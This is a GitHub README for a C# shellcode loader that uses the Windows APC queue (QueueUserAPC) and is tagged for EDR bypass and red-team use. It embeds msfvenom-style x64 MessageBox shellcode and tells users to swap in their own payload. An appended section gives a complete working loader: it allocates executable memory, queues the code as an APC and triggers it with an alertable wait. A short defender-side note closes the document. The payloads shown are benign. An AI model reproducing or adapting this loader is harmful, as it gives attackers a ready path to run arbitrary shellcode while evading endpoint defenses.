# APC_ShellcodeExecution_CSharp

Repository: https://github.com/Kara-4search/APC_ShellcodeExecution_CSharp (C#, last pushed 2021-08-30). Description: shellcode load or execute via the "APC technique". Topics: bypass, csharp, edr, hacking, injection, pentest, redteam, shellcode-injection, shellcode-loader.

blog link: may not be updated

- Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges (reference 8).
- APC injection is a method of executing arbitrary code in the address space of a separate live process.
- The QueueUserAPC function adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread (reference 9). A user-mode APC is not run immediately; it is delivered only once the target thread enters an alertable state (an alertable wait such as SleepEx, or NtTestAlert).
- Only tested on Win10/x64, where it works fine. It should also work on x86 with x86 shellcode, but that is untested; the payload below is x64 (REX-prefixed instructions, PEB lookup through gs:[0x60]).
- The shellcode below is a MessageBox (msfvenom-style x64 payload; the embedded strings are "Hello, from MSF!" and "MessageBox").
```
            /* MessageBox */
            byte[] buf1 = new byte[323] {
                0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
                0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
                0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
                0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
                0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
                0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
                0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
                0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
                0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
                0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
                0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
                0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
                0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
                0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
                0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
                0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
                0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
                0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
                0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
                0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,
                0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,
                0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00
            };
```

## Usage
1. Just replace the shellcode with your own (it must match the architecture of the loader process).
- MessageBox
	![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/APC_ShellcodeExecution.png)

## TO-DO list
- None

## Update history
- None

## Reference link:
	1. http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html
	2. https://idiotc4t.com/code-and-dll-process-injection/apc-and-nttestalert-code-execute
	3. https://idiotc4t.com/code-and-dll-process-injection/apc-injection
	4. https://idiotc4t.com/code-and-dll-process-injection/apc-thread-hijack
	5. https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert
	6. https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
	7. https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection
	8. https://attack.mitre.org/techniques/T1055/004/
	9. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
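The following is an added example, not the project's own code, showing the QueueUserAPC mechanism the README describes in the local-process form: allocate memory for position-independent code, queue its address as a user-mode APC on the current thread, and then force the thread into an alertable state so the kernel delivers the APC. Instead of the README's 323-byte MessageBox payload it uses a constructed seven-byte x64 stub that writes 0x1337 through the APC argument (`mov dword ptr [rcx], 0x1337; ret`), so the reader can observe exactly when the APC runs. The P/Invoke signatures are the documented kernel32 ones; the class name and the RW-then-RX allocation order are choices made for this example and are not taken from the repository.

```csharp
using System;
using System.Runtime.InteropServices;

// Added example (not the project's code): execute a position-independent x64 stub
// in the current process by queueing it as a user-mode APC on the current thread.
// The APC is only delivered once the thread becomes alertable, which the program
// demonstrates by reading a marker cell before and after the alertable wait.
class ApcLocalExecExample
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    // pfnAPC receives dwData as its single argument (RCX on x64).
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, UIntPtr dwData);

    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentThread();

    [DllImport("kernel32.dll")]
    static extern uint SleepEx(uint dwMilliseconds, bool bAlertable);

    const uint MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000;
    const uint PAGE_READWRITE = 0x04, PAGE_EXECUTE_READ = 0x20;

    static void Main()
    {
        // Constructed x64 stub standing in for the README's buf1 (x64 only: on x86 the
        // APC argument arrives on the stack, not in ECX):
        //   C7 01 37 13 00 00   mov dword ptr [rcx], 0x1337
        //   C3                  ret
        byte[] stub = { 0xC7, 0x01, 0x37, 0x13, 0x00, 0x00, 0xC3 };

        // Allocate writable, copy, then flip to executable so no RWX region ever exists.
        IntPtr mem = VirtualAlloc(IntPtr.Zero, (UIntPtr)stub.Length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (mem == IntPtr.Zero)
            throw new InvalidOperationException("VirtualAlloc failed: " + Marshal.GetLastWin32Error());
        Marshal.Copy(stub, 0, mem, stub.Length);
        if (!VirtualProtect(mem, (UIntPtr)stub.Length, PAGE_EXECUTE_READ, out uint _))
            throw new InvalidOperationException("VirtualProtect failed: " + Marshal.GetLastWin32Error());

        // Unmanaged cell the stub writes to; its address is passed as the APC argument.
        IntPtr marker = Marshal.AllocHGlobal(4);
        Marshal.WriteInt32(marker, 0);

        // Queue the stub on our own thread. GetCurrentThread() returns a pseudo-handle,
        // which QueueUserAPC accepts for the calling thread.
        if (QueueUserAPC(mem, GetCurrentThread(), (UIntPtr)(ulong)marker.ToInt64()) == 0)
            throw new InvalidOperationException("QueueUserAPC failed: " + Marshal.GetLastWin32Error());

        // Queued but not yet executed: user-mode APCs wait for an alertable state.
        Console.WriteLine("marker before alertable wait: 0x{0:X}", Marshal.ReadInt32(marker));

        // An alertable wait of zero length drains the APC queue. NtTestAlert from ntdll
        // (reference 1, 2, 5 above) achieves the same without a wait call.
        SleepEx(0, true);

        Console.WriteLine("marker after alertable wait:  0x{0:X}", Marshal.ReadInt32(marker));
        Marshal.FreeHGlobal(marker);
    }
}
```

Build as a 64-bit console program; the first line shows 0x0 and the second 0x1337 once the APC has executed. Replacing `stub` with the README's `buf1` runs the MessageBox payload through the same path. From the defender's side, the sequence to watch for is exactly what this program does: a fresh private allocation made executable, followed by QueueUserAPC targeting a thread of the caller's own process and an immediate alertable wait or NtTestAlert call.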